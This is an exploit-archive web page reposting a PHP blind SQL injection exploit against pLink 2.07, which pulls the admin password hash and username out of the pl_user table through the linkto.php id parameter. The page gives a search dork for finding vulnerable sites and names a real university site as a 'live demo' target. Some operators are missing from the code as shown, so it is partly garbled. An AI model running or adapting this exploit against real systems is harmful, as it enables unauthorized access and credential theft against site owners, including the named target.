手机
当前位置:查字典教程网 >网络安全 >Exploit >pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit
摘要:

<?php

ini_set("max_execution_time",0);

print_r('

###############################################################

#

# pLink 2.07 - Blind SQL Injection Exploit

#

# Vulnerability discovered by: Stack

# Exploit coded by: Stack

# Greetz to: All My Freind

#

###############################################################

#

# Dork: intext:"pLink 2.07"

# Admin Panel: [Target]/link/

# Usage: php '.$argv[0].' [Target] [Userid]

# Example for http://www.site.com/link/linkto.php?id=[Real id] 2

# => php '.$argv[0].' http://www.site.com/link/linkto.php?id=128 2

# Live Demo :

# http://www.uni-leipzig.de/fsrpowi/link/linkto.php?id=128 2

#

###############################################################

');

if ($argc > 1) {

$url = $argv[1];

if ($argc < 3) {

$userid = 1;

} else {

$userid = $argv[2];

}

$r = strlen(file_get_contents($url." and 1=1/*"));

echo "nExploiting:n";

$w = strlen(file_get_contents($url." and 1=0/*"));

$t = abs((100-($w/$r*100)));

echo "Password: ";

for ($j = 1; $j <= 32; $j ) {

for ($i = 46; $i <= 102; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select pwd from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 102;

}

}

}

echo "nUsername: ";

for ($i=1; $i <= 30; $i ) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$i.",1))!=0/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$count = $i;

$i = 30;

}

}

for ($j = 1; $j < $count; $j ) {

for ($i = 46; $i <= 122; $i=$i 2) {

if ($i == 60) {

$i = 98;

}

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".$i."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

$laenge = strlen(file_get_contents($url." and ascii(substring((select username from pl_user where id=".$userid." limit 0,1),".$j.",1))>".($i-1)."/*"));

if (abs((100-($laenge/$r*100))) > $t-1) {

echo chr($i-1);

} else {

echo chr($i);

}

$i = 122;

}

}

}

} else {

echo "nExploiting failed: By Stackn";

}

?>

【pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit】相关文章:

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Friendly Technologies (fwRemoteCfg.dll) ActiveX Command Exec Exploit

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

LoveCMS 1.6.2 Final Remote Code Execution Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

WarFTP 1.65 (USER) Remote Buffer Overlow Exploit

精品推荐
分类导航